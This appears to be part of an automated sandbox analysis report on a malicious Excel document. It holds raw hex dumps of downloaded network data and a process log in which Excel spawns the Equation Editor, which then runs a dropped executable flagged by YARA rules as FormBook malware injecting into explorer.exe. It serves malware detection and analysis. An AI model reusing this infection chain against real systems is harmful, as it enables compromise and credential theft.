                                              2022-01-14 15:04:36 UTC336INData Raw: 41 55 b8 6b 66 55 30 fd 15 da f4 b3 37 ea 3c 98 a0 a3 58 88 d6 3b 2d ba 70 7b b1 19 0b f9 d5 d3 e0 52 50 64 2e bc 4b 41 41 9b 4f a4 b0 7c d0 ac e8 68 40 47 f0 bc 32 25 9c 63 f6 35 23 e6 85 19 7d 7e 56 39 33 0f 2c 3a ee 3c 6e 94 77 d4 05 55 85 56 e1 f7 6c 8d ce 1a 35 73 a7 92 8c 18 35 81 83 0e 3f d4 69 39 e7 12 c8 1d b6 19 94 84 2c 6f 0e a8 1a 57 41 69 3f 9b 60 d6 9c 26 c1 4d 3c 2a 85 d1 30 5c f4 d6 ef 88 f3 25 7b 21 d9 08 f1 f3 45 37 09 8f 07 95 f3 8c 2c 44 cf 73 6b 26 33 40 80 b9 2e 2e a9 0a 5a c1 5a 3f 1d d1 01 2b 43 5d 18 4c 96 e4 3b 25 74 16 a3 4f fb 31 46 10 21 e4 59 e5 ee c0 34 2c aa f2 8e 54 30 28 2c f0 96 92 82 1b 44 09 81 b1 1f 57 ed 14 a3 60 59 94 45 4d e7 a4 c4 3c 5f 9d 8e 01 23 6c 96 af 20 48 95 52 36 58 fe f0 5c 55 ba 0a 31 61 67 42 5d 66 0c
                                              Data Ascii: AUkfU07<X;-p{RPd.KAAO|h@G2%c5#}~V93,:<nwUVl5s5?i9,oWAi?`&M<*0\%{!E7,Dsk&3@..ZZ?+C]L;%tO1F!Y4,T0(,DW`YEM<_#l HR6X\U1agB]f
                                              2022-01-14 15:04:36 UTC352INData Raw: b4 1b 91 34 0f aa 67 17 a2 73 33 c2 8d 04 6e d4 6d ac aa 9e c4 1a fb cb 50 c5 51 10 8f 95 e6 58 75 7f e5 9e f2 87 8e 8c 33 0e 5f 73 96 bc 40 db b7 95 36 13 51 83 c0 ef ae 12 0d 55 57 ee 87 4a 2e f3 51 11 0c 67 8c a2 8a 30 25 a9 45 29 cc e7 ce 1d 5f 73 62 aa aa 3c e0 1c ab 71 a2 06 75 6b 17 f4 df 72 5b 6d d4 0d 22 b0 a4 e1 22 b6 0a ca 0e be e2 41 18 66 4e 6c 55 0f 1a ac 8b c8 a4 43 f0 22 9b 55 11 c8 09 04 c3 ed a2 ac 29 8c ee a2 92 86 7a b1 df 80 33 c4 f8 b4 aa 2f ef 06 95 6d 4e df be 06 22 a2 26 07 01 0b e2 bb 3a ab df fc fa 07 5b 1f f8 f4 97 eb 42 b6 e1 cf c3 ff 46 e9 fc 9f eb e9 ba 4a db 17 04 bf f8 f9 ab cc 57 fe b8 f1 c1 d7 7d f8 90 04 38 cf 82 d5 8d 39 aa b3 d4 f7 82 4f dc 73 fe e2 ff 00 2b 26 c2 57 f7 85 4f 8e 01 52 4a 03 8d f6 8e dd 3c 56 00 5a 0c
                                              Data Ascii: 4gs3nmPQXu3_s@6QUWJ.Qg0%E)_sb<qukr[m""AfNlUC"U)z3/mN"&:[BFJW}89Os+&WORJ<VZ
                                              2022-01-14 15:04:36 UTC368INData Raw: ae a8 b3 5b 02 06 f4 fe 36 7d ee 97 02 a4 9a f9 ba cc 5c 83 19 9a 6a bd 07 3c ce 00 25 cd be 5e 48 83 d2 1c 28 6e f4 98 da 2b 06 b0 a4 3e f1 92 89 88 b9 03 ab 7f 76 53 c5 2b 20 7d f4 ce bb e4 85 2b 80 e4 fe 10 40 8a be 87 3e 4f 91 7e 5d e5 d2 0c eb 55 2f 31 7d 91 96 86 34 18 7e 28 39 4a 8a 68 56 67 a7 fc f7 f6 96 ef 26 4b d4 1e 2d 03 87 d9 cf cd 00 cf 3d ea 8d e4 93 e4 2b 9e 49 5d 10 90 ef bd 2b 5d 78 58 14 aa 1b 3a c9 f7 d2 0c f1 c3 54 99 54 2f 66 e4 2c d2 85 4a bb 4c 9e 55 6a bb a1 81 80 e9 c1 a2 1d 3c ea e0 80 ee 02 41 60 9f 76 76 d2 68 64 4d 00 d8 85 97 d6 3c ab cd cb b3 3b 24 79 04 c1 90 c9 62 9b 39 19 19 f8 ba 4f f3 96 3b 25 e9 5c 96 92 0f 07 c2 aa f8 f9 3c ab 79 bb ce 4a 02 58 cc 07 45 58 37 c2 4c c4 b8 83 ef e5 08 52 50 d8 24 b0 70 0d 52 0c f7 bb
                                              Data Ascii: [6}\j<%^H(n+>vS+ }+@>O~]U/1}4~(9JhVg&K-=+I]+]xX:TT/f,JLUj<A`vvhdM<;$yb9O;%\<yJXEX7LRP$pR
                                              2022-01-14 15:04:36 UTC384INData Raw: ed 07 89 b3 9c b8 e3 2a b1 6a be 10 db 2f 29 1a b0 7e 50 58 a4 17 38 31 7d 57 3f 6d 13 ff e4 74 7f 1c 32 76 d1 ba c2 72 ad 39 09 46 51 5e 27 01 b3 f4 70 c8 5d 3a 8a 20 65 fd a8 05 a1 23 4f d2 d1 9a 55 0c f8 45 cf b9 85 51 8a ee d8 c0 c0 e4 6d 67 f2 a2 22 b5 b4 53 60 14 0e 83 7a 15 a8 1a bb a6 08 e2 05 d9 28 4f 1b 8f f8 92 82 f8 19 a8 8b 1e 63 e2 6d 0f e2 19 58 dd 2b dc 9b bd 0c d0 9a 12 98 59 e2 ee 47 6b d6 e0 36 63 33 b6 37 50 40 11 e6 5b da 5d 59 ea 18 73 a3 7c c4 ea e7 d6 8c 51 39 44 0d 8c 74 26 1d ab 78 b4 55 56 28 43 3b 44 81 a1 a9 69 d4 83 24 a8 08 56 58 a8 c5 07 7b 73 db db 53 ac e4 53 b9 9f 51 f0 a6 8e 7a a6 88 30 2e f3 9f df 28 fd a1 8a 72 40 09 ab a7 c2 0c c1 06 6e 7c 03 4b d0 ac 13 59 ac 7d 53 c3 5e 41 83 c6 81 ab 29 0c a1 41 f9 92 d7 60 05 14
                                              Data Ascii: *j/)~PX81}W?mt2vr9FQ^'p]: e#OUEQmg"S`z(OcmX+YGk6c37P@[]Ys|Q9Dt&xUV(C;Di$VX{sSSQz0.(r@n|KY}S^A)A`
                                              2022-01-14 15:04:36 UTC400INData Raw: 35 2a 58 79 0d ee 4e f2 86 13 95 d6 ce 4a e7 7e ef 8d 2a 77 9b e5 65 8c 49 47 b2 a7 55 19 4d 7d 01 2a 68 8b 07 50 84 bf f6 69 58 95 e3 99 b3 60 1b 00 1b a9 ee a8 32 0c f1 b2 d2 b8 7b 3f cb 4b 42 d4 19 7f 7d a1 07 c1 6e 45 8d 98 47 e1 91 6a ec 6a cf 30 cf f4 56 2b ee 1f af 61 dd 20 67 9d 71 b4 52 bf b5 28 87 ef fc fc fa f1 0a 35 ea 6e 18 13 2a 92 ee f2 9b 69 03 2d a1 4a b7 86 72 4c bf 97 c3 9e 78 7c e1 89 cb 2d 67 dd 88 ce a1 67 2e a5 1a 5b df 84 d3 c0 de 82 a2 11 e8 a3 2b e3 24 ac bf 8d c8 26 ce 00 7b ab 34 86 a3 ca 5a b8 79 36 b0 d7 ee 26 32 ad 60 28 2f 1f a7 5d 4b b6 85 6f d1 43 97 b1 59 2b 82 59 12 b6 da c8 68 4e 1f d7 2f 37 9c 1a ad e8 8e 1d d6 06 fe fa 8f eb 4e 1a bf fa b6 bf fa 9b f7 32 e4 9c af 0b 66 de f7 88 da 7d 07 22 f8 5f b2 ef 9a 7c f6 f7 be
                                              Data Ascii: 5*XyNJ~*weIGUM}*hPiX`2{?KB}nEGjj0V+a gqR(5n*i-JrLx|-gg.[+$&{4Zy6&2`(/]KoCY+YhN/7N2f}"_|
                                              2022-01-14 15:04:36 UTC416INData Raw: 68 de be e0 b3 7a dc 8e eb ff 00 2b d1 06 7b 52 4c 15 bf af 01 dc b3 a1 00 03 48 09 bc c5 7d a3 08 2d 91 df 2f 5c 76 11 16 4a 1a 2e f7 eb 00 f7 3e 2b 6a bf bd 4d 20 4a ca b3 93 a7 88 86 c2 62 57 be fd 71 21 fd 5b d7 27 0b 8a cd 50 b2 d1 f7 1a 39 b5 a4 66 09 8c 48 89 45 1d a3 44 d5 92 d6 24 13 53 50 ef ff b4 1a 97 f5 00 1f f9 b9 d3 f7 ee 6d 0b fb b5 81 e5 df df 50 f2 f2 ee 2b ff 42 d2 43 52 6e 4e 4e 48 59 fa a9 ed 6f 92 d2 8f 1c 43 f3 24 95 67 85 5b 5f 47 3e 3f 7f 78 f4 d5 d7 3d 3c fa da da 7d 07 fc 7b ee d5 3b 46 ac dc 17 a8 42 7b 8f 02 2f dd 13 94 2d 43 39 7e 2d 90 b3 7f 16 e7 cd 5f 89 cf d6 94 0c fc a9 ec c1 12 70 ff 13 e1 c7 9f 2b 8d f0 ed 67 a9 d4 85 57 95 26 2f 35 8c 20 bf 23 11 7e dd 53 5b 65 c1 bd a5 24 61 4a e0 17 fb 60 c2 4a 39 d8 87 b7 a5 e8 e8
                                              Data Ascii: hz+{RLH}-/\vJ.>+jM JbWq!['P9fHED$SPmP+BCRnNNHYoC$g[_G>?x=<}{;FB{/-C9~-_p+gW&/5 #~S[e$aJ`J9
                                              2022-01-14 15:04:36 UTC432INData Raw: f0 8b d2 ca 6d 6e 24 ae 50 b9 eb 8a aa 20 e7 1e d1 10 e6 fa 76 ea 84 2f cb d7 35 61 11 f1 b3 46 ce b0 73 a9 0a 41 0b f5 fc 2e 08 13 77 5d 8f f9 0e 3d d9 9d 83 48 18 a9 f0 f3 32 df 49 c5 5a 81 46 ad 79 7c 2d 58 9b 5b f6 94 1e bd bc 8f e2 1a 44 99 44 b3 0a df 25 18 cf b8 26 88 61 6a 4e dd 5b 42 e6 05 d8 e1 60 fc 54 3c 6a d0 d1 42 1d ed 69 cf 1d 47 86 ca d5 4d ea 72 77 50 b0 06 b1 ad c3 20 5f c2 75 20 3e 8d 09 8a 50 e1 aa 20 1b db 37 c7 6b b4 35 cd b3 7d 9e f2 e9 a0 39 36 22 cc 19 7d 33 c4 83 89 01 71 6e b7 f6 43 6b 6f 02 80 e0 49 38 ae 84 15 b3 81 59 32 50 65 9d 55 68 64 0e c9 f5 7c 9c 53 64 64 78 93 60 85 1c 8d 94 bc 60 53 84 8a d3 ee 08 2f cc ae a2 86 5e 56 de b3 a2 07 30 a4 3f a9 1b 16 d0 8a 8e db 26 86 fb 58 91 95 a3 75 c1 70 74 d3 d6 a6 06 c2 7e 2e 69
                                              Data Ascii: mn$P v/5aFsA.w]=H2IZFy|-X[DD%&ajN[B`T<jBiGMrwP _u >P 7k5}96"}3qnCkoI8Y2PeUhd|Sddx``S/^V0?&Xupt~.i
                                              2022-01-14 15:04:36 UTC448INData Raw: 36 3d 23 5e d5 0d d7 c3 76 84 8f a8 c2 48 16 36 9f 66 bc 46 b1 05 82 d0 74 a4 a2 59 03 4b 4b 25 d2 71 0e 1d 35 33 e6 20 ce d6 92 44 c3 1c ef 36 7b 9a be 75 12 a8 9f 64 8f 23 f2 8d 72 ed ce 9f 5c eb db b6 a6 ac 66 b5 08 47 a7 1d f3 40 33 d3 14 9d 53 66 77 27 bf 17 15 2f 30 9c 99 43 4b 92 ac 2e 25 c0 d5 57 d1 be a7 77 32 56 8c 0e ea 5e e3 45 52 0c c3 0d c6 da 6e f0 94 bc d3 bb 90 a9 09 b7 cc e6 a3 b6 c9 c7 f3 e1 99 dd ac a8 0e 5e db 12 f6 45 28 ab 35 44 07 16 4a 84 37 40 0b c4 24 1d 57 f0 48 96 1a 2f ec 33 59 12 1e b6 1b b2 09 5c b0 ac 2d 2d 47 8a 83 05 33 ce 62 6c e8 19 c0 98 aa 00 75 00 13 d0 de 87 f9 1b b1 e9 a0 e1 89 c5 63 3d f4 30 04 04 00 83 3e e5 bd 3e 6a 50 20 6d 8e 07 6e 3b 76 6c 6f 25 27 79 6d eb 9c 75 23 69 9c 8d 34 03 65 3c 06 9a 10 4e 8b 9d 09
                                              Data Ascii: 6=#^vH6fFtYKK%q53 D6{ud#r\fG@3Sfw'/0CK.%Ww2V^ERn^E(5DJ7@$WH/3Y\--G3bluc=0>>jP mn;vlo%'ymu#i4e<N
                                              2022-01-14 15:04:36 UTC464INData Raw: 53 69 88 57 36 59 c4 03 67 49 16 91 58 44 64 23 29 9a b7 a2 e1 94 60 22 6a 43 39 f3 9a 51 d9 41 76 d7 17 13 4d 3a d4 57 f6 b4 f8 dd f0 a4 2a b3 78 bf f7 55 09 d1 5f 7c 08 7c f8 d1 77 7b b3 c3 a3 37 7d f9 2f be f3 cf ff ef 97 32 65 15 cf f2 f6 1f 7e 70 5b 7d d1 c1 fd 1f 8c d0 3b 80 cd 1b 40 42 83 d5 50 79 a2 99 a3 0d d6 23 ef a5 93 be ce ff 13 ac 76 2f 64 ff 0a 10 de ad 3b 9d 96 6d 34 08 d1 40 03 10 d7 5b 37 fa ff bb 3d f8 5f 34 9b fa de 5b 5a 9e 1d 24 87 d7 0c ff 36 9d 81 a0 80 85 d3 a5 5b 67 1a 0f 9f 2d d1 09 09 4f bb 13 74 ac 71 9d dc fa ad 88 5f a1 8f 49 8f dd 4a 4a b3 dc 17 d0 05 f6 fd 25 7d 0c 80 54 57 ed 34 48 7d e0 33 11 15 ed b3 a2 9e e3 a0 77 23 29 66 65 ed 4b fb 77 c9 c7 ee 01 66 e0 2b 4f 92 c0 1f 3e 46 02 3f fa 28 d6 58 41 a8 4b dc 1b ee 35 05
                                              Data Ascii: SiW6YgIXDd#)`"jC9QAvM:W*xU_||w{7}/2e~p[};@BPy#v/d;m4@[7=_4[Z$6[g-Otq_IJJ%}TW4H}3w#)feKwf+O>F?(XAK5
                                              2022-01-14 15:04:36 UTC480INData Raw: 26 bb 30 b3 08 f9 47 b0 a4 1b 62 7b e7 4c f7 83 24 a8 28 53 00 06 af 49 36 44 b0 9d cf 10 ef ad 89 31 0b 82 75 88 01 90 00 2a b2 61 c4 1f ee c0 a5 c4 5d c9 77 61 7c 84 84 c3 c9 b4 50 60 75 87 4f 3f a9 7a 8c d0 00 24 4b 79 fc 6e fb 18 e9 88 77 ec 16 3f bf d3 86 53 57 2f ac bc 28 f4 a2 0e 77 75 b0 5b be 43 76 ae b9 7b f0 73 f7 49 30 23 97 e5 bc 73 67 7f 78 14 d7 55 81 f7 00 d8 e7 36 92 90 f4 a5 40 fe b1 5d 83 08 1f 46 66 65 11 3f 7f 4d 00 a3 98 04 47 da ae 65 d8 01 01 62 a3 1b e0 c7 ee 7e fe 73 f7 ff f5 62 f7 79 80 ee 1e f0 e6 c1 5b 4d 6f 06 b0 d7 e0 12 df 23 f5 d7 57 5e b1 78 05 21 03 49 80 7a d7 c5 6b 17 c0 ef 8c f0 fa ce ba f0 af cf 59 17 26 2b e2 df b8 33 85 96 8b 2f 5d 72 08 19 48 21 c0 aa d5 9c 2b c9 ee 36 4b 6b 42 15 b3 06 39 01 a1 9e 3d b2 56 24 35
                                              Data Ascii: &0Gb{L$(SI6D1u*a]wa|P`uO?z$Kynw?SW/(wu[Cv{sI0#sgxU6@]Ffe?MGeb~sby[Mo#W^x!IzkY&+3/]rH!+6KkB9=V$5
                                              2022-01-14 15:04:36 UTC496INData Raw: 09 e9 56 27 ce 71 a1 c3 74 59 e0 92 00 b0 0f fe 36 71 ad 9f dd dc 3d f8 32 01 c6 d9 8e 2d 09 ac 7f 82 90 81 ca d2 6f 12 32 10 c7 99 cf 15 d7 73 4f fd f2 0a f8 e2 3b f1 6d ee 73 e1 67 9e 4b 5d f8 4e fb 78 ef f2 a7 f0 ff 20 64 e0 11 01 56 43 75 d7 54 e3 b6 18 43 b4 af 5a c8 01 60 43 f7 e1 15 0f 2e 5e 4b 2c a2 05 9c 12 dd 7a 16 f8 ae 47 7f 17 3c 0a 9c 02 40 79 60 38 1f 43 51 56 df b5 c6 11 0c c1 dd 05 31 ae 28 b9 e7 8a 95 7c 3c b6 06 25 e4 ec c7 f3 6b 56 19 be 01 ad ff 7f 5d bd 09 94 2b 79 7d df db 2d 05 d3 da f7 ad 5b 25 75 6b 01 95 4a a5 d2 be 74 6b 19 ba 5b a3 7d df 55 ba d2 4c b7 34 da f7 d2 56 d2 48 0e 9e 4b 4e fc 60 e2 b1 1d 3b c9 61 0b be c6 cf c1 e4 d9 31 18 82 f1 f8 e1 00 e3 d8 38 0e 89 1d ec 40 62 68 30 0f 78 06 1f fb 9d 38 26 d8 f0 aa 74 07 27 99
                                              Data Ascii: V'qtY6q=2-o2sO;msgK]Nx dVCuTCZ`C.^K,zG<@y`8CQV1(|<%kV]+y}-[%ukJtk[}UL4VHKN`;a18@bh0x8&t'
                                              2022-01-14 15:04:36 UTC512INData Raw: e7 c8 cf c8 d8 94 e7 94 2b b7 f5 be d1 a6 21 7b 94 aa 3e eb 45 53 9f f9 82 69 cc 7e d1 34 39 d5 65 3e 67 6a af 3e 27 8f 89 e4 b8 fe da 73 a6 41 8e 1b 32 9f 95 db cf ca 63 cf 98 9a 2b 4f 9b 7a 19 eb 33 9f 31 75 72 dc 94 3f d5 dc 6a 3b 6e ca ae ad 30 1b 27 7d d5 43 60 59 4f 7f ce ef 01 e0 ee 00 f8 35 36 f0 4c 7e e4 d7 6f 2d 7e f6 bf 9a dc 6b 93 cd e9 d7 7f d6 09 00 27 77 de ef 4a 80 8f 02 00 c3 ba 00 c0 30 93 7b 31 06 00 97 86 77 02 40 59 ce 14 73 a3 3d cb b4 35 9d 13 00 ac 53 d5 a9 00 80 d7 06 3b 62 fe 72 0f 00 cc bf c1 69 63 04 00 95 40 20 a2 96 10 10 5a 05 04 16 00 9b 2d 04 6a 2c 08 d4 fc 01 00 b6 38 00 c8 a8 02 00 a2 ba 68 75 08 04 2c 00 d2 a3 01 b0 4e 00 b0 bb 9f 79 fb f5 01 e6 f4 81 78 73 fa 20 10 18 2c 7f df a1 0e 00 c3 cd c5 13 62 7e 01 c0 e5 33 4f
                                              Data Ascii: +!{>ESi~49e>gj>'sA2c+Oz31ur?j;n0'}C`YO56L~o-~k'wJ0{1w@Ys=5S;bric@ Z-j,8hu,Nyxs ,b~3O
                                              2022-01-14 15:04:36 UTC528INData Raw: b4 37 ec 0f ce 05 e0 aa c0 cc f2 c4 70 5f 9b d3 e9 27 89 b2 2a 80 f1 99 f5 01 04 7d 02 62 bd df fc 03 10 80 04 cf f5 df 07 c8 eb 60 6c 1e c3 ec bc 1e 50 c1 f4 03 06 0c 88 bb ef be fb 74 15 81 9f a1 a4 e0 98 f7 a1 77 e0 bf 88 04 08 50 06 b0 c4 c8 49 4a 00 c9 b8 dd 84 3d 6e d4 6e 54 6f f9 20 e8 45 41 e7 0d ff 4c a7 04 70 c6 6f 04 ca 9c 64 2e 76 02 c0 b8 4e 00 c8 4e f7 09 20 41 57 03 02 00 9c 8d 0f 01 c0 97 00 f1 d6 fc e7 13 22 7d 80 a0 14 70 29 40 93 40 42 d0 08 0c 9b 9f 14 90 e7 cc 9f 9f ea 01 30 58 01 50 5d c0 d7 81 7b 00 8c b7 d2 52 00 f3 a3 f1 02 80 09 02 00 51 ce 04 05 41 18 00 51 10 50 00 88 30 7e de a4 18 00 58 35 a9 1c 00 c2 20 28 8a a8 55 21 30 55 00 30 55 37 05 dd 8a 49 00 fb b7 ce d6 73 01 fc 05 41 30 3e 00 f0 97 05 f7 3b 01 3d 04 fc 25 c1 fc 85
                                              Data Ascii: 7p_'*}b`lPtwPIJ=nnTo EALpod.vNN AW"}p)@@B0XP]{RQAQP0~X5 (U!0U0U7IsA0>;=%
                                              2022-01-14 15:04:36 UTC544INData Raw: 56 00 2c 8a 01 40 46 7c 0f 80 3e d9 01 b0 3c 13 00 fa a7 03 c0 1c 00 35 80 55 40 60 80 8a bf 79 8d af 01 68 43 d0 9a 01 c9 b3 01 11 00 82 03 08 b1 0b f1 a7 02 60 9d 87 c0 fe f5 25 2d 00 60 78 76 00 20 7e f9 39 13 00 e2 e2 3f 15 07 80 c4 e9 10 67 08 05 40 59 12 00 ce a6 01 a0 4c d2 81 32 f7 e5 89 77 dc b7 e2 04 9a d7 3c 24 2e e0 06 b7 f8 95 1e 6e ee 07 2f 38 c9 93 a3 bb 07 59 3d 80 db 87 d9 5d 84 6d c5 20 2b 05 b9 7b 10 a9 00 a2 8f 0b df 0a 84 fc 8c 03 00 00 a3 4a f3 dc 33 77 ff 87 9b f3 62 47 57 27 0e 60 9f 8c f2 08 1e 00 1c 94 d1 1f 37 60 10 b8 70 e8 0d 77 e1 d8 0c 37 fb 59 2f fe 57 27 ff 64 e3 fc 97 fb fd 7f e4 cc 54 d0 11 24 15 74 44 66 5b 71 31 c0 d0 a1 c7 0c 00 c2 22 0f b7 bd fc c9 bf 19 75 11 22 f0 70 29 5d 7a c0 84 d1 9d f7 31 6a 5b f1 8e 74 20 3e
                                              Data Ascii: V,@F|><5U@`yhC`%-`xv ~9?g@YL2w<$.n/8Y=]m +{J3wbGW'`7`pw7Y/W'dT$tDf[q1"u"p)]z1j[t >
                                              2022-01-14 15:04:36 UTC560INData Raw: 43 27 20 85 bb a2 a2 22 15 0e 45 3d fa ee 11 9f 8d b0 08 1f 11 fd ff dd 9d 07 98 54 e5 f9 f6 63 12 54 32 db 80 65 e9 bd 2c 1d 76 91 de ab 28 bd 2e bd 97 58 40 01 15 44 14 05 c1 42 94 22 60 85 d8 50 10 e9 8a 15 14 8d 05 45 50 8a 80 a0 a0 c6 1a a3 51 34 89 20 be df fd 7b 67 9e e1 ec b2 0b 0b ec 66 fd 7f 5c d7 cb ec cc 9c 36 e7 9c fb 7e ee a7 bc cf 21 1a 8f 85 47 15 10 8c 03 e0 c8 70 a2 e9 d4 11 10 78 c3 4a 63 b1 51 0a 04 a0 b9 ff 50 04 c1 2a 3c de 43 28 6c 8b ef d9 2e a9 40 a4 3e d2 1f a0 12 bc 03 fc 90 10 cb 10 a8 04 e4 a4 f2 00 2f df 31 ac c1 87 3d e9 87 ef 20 8c e0 13 85 70 63 c8 f9 f3 1d 9f a3 36 f8 7d c4 2e f2 1c a8 b9 35 c8 02 d0 15 98 13 47 1a 30 4a 00 9b 27 fa 0a bf 74 0a e0 6c 09 40 ef 19 db d6 f7 f2 24 70 02 01 3c d5 c7 cb ff 53 11 c0 ae 67 c2 e0
                                              Data Ascii: C' "E=TcT2e,v(.X@DB"`PEPQ4 {gf\6~!GpxJcQP*<C(l.@>/1= pc6}.5G0J'tl@$p<Sg
                                              2022-01-14 15:04:36 UTC576INData Raw: 6f c4 08 48 fe fd a2 45 8b 62 04 1a ff 7d c6 21 a0 c4 b0 be 40 1e 33 6f de bc 18 91 48 48 9f 79 ab 8e b4 9f 3b 77 6e 48 56 34 24 d0 10 e0 0b c9 02 87 90 dd 54 ec 51 d4 43 6c 09 ab 0c 08 01 3c 16 98 ef e8 18 64 8d 3c b1 e8 14 06 61 d5 f1 bd 49 df 51 cb cf 6c 3e fc fb b4 b4 34 6f fd 89 0d 50 1b 60 6d c1 70 0b 00 2a ef c9 1c e0 ef 13 cd c7 0d a0 b2 10 1f 9e 18 03 d6 9f 65 99 58 44 e9 31 99 00 48 80 e3 a4 10 09 b2 e1 3d 92 df a6 2d b3 1e b1 0a f6 87 0a b1 ce c1 90 43 9e 83 3d 07 09 20 1d 11 dc 79 e7 9d f9 c5 a8 b1 c4 02 24 b5 60 7f 6a 03 0a e8 82 14 44 02 32 50 05 48 45 91 82 27 02 f9 89 45 e4 3f 16 c3 77 d4 7a 64 0e 08 12 95 a6 54 54 80 2f 4b 3d 01 33 0b e5 2e 54 90 1b 41 3a b1 12 15 24 02 6f b2 14 43 15 11 42 55 b9 0a 64 14 6a 10 43 a0 e4 54 ee 42 6d 29 82
                                              Data Ascii: oHEb}!@3oHHy;wnHV4$TQCl<d<aIQl>4oP`mp*eXD1H=-C= y$`jD2PHE'E?wzdTT/K=3.TA:$oCBUdjCTBm)


                                              Code Manipulations

                                              Statistics

                                              Behavior

                                              System Behavior

                                              General

                                              Start time:16:03:27
                                              Start date:14/01/2022
                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                              Imagebase:0x13fa90000
                                              File size:28253536 bytes
                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:16:03:46
                                              Start date:14/01/2022
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                              Imagebase:0x400000
                                              File size:543304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:16:03:50
                                              Start date:14/01/2022
                                              Path:C:\Users\Public\Pcportk28.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\Public\Pcportk28.exe
                                              Imagebase:0x10e0000
                                              File size:601600 bytes
                                              MD5 hash:25EE51200E7D86AB2C531748E5C01C72
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.486571220.0000000002581000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low

                                              General

                                              Start time:16:03:54
                                              Start date:14/01/2022
                                              Path:C:\Users\Public\Pcportk28.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\Public\Pcportk28.exe
                                              Imagebase:0x10e0000
                                              File size:601600 bytes
                                              MD5 hash:25EE51200E7D86AB2C531748E5C01C72
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:16:03:56
                                              Start date:14/01/2022
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0xffa10000
                                              File size:3229696 bytes
                                              MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, Author: Joe Security
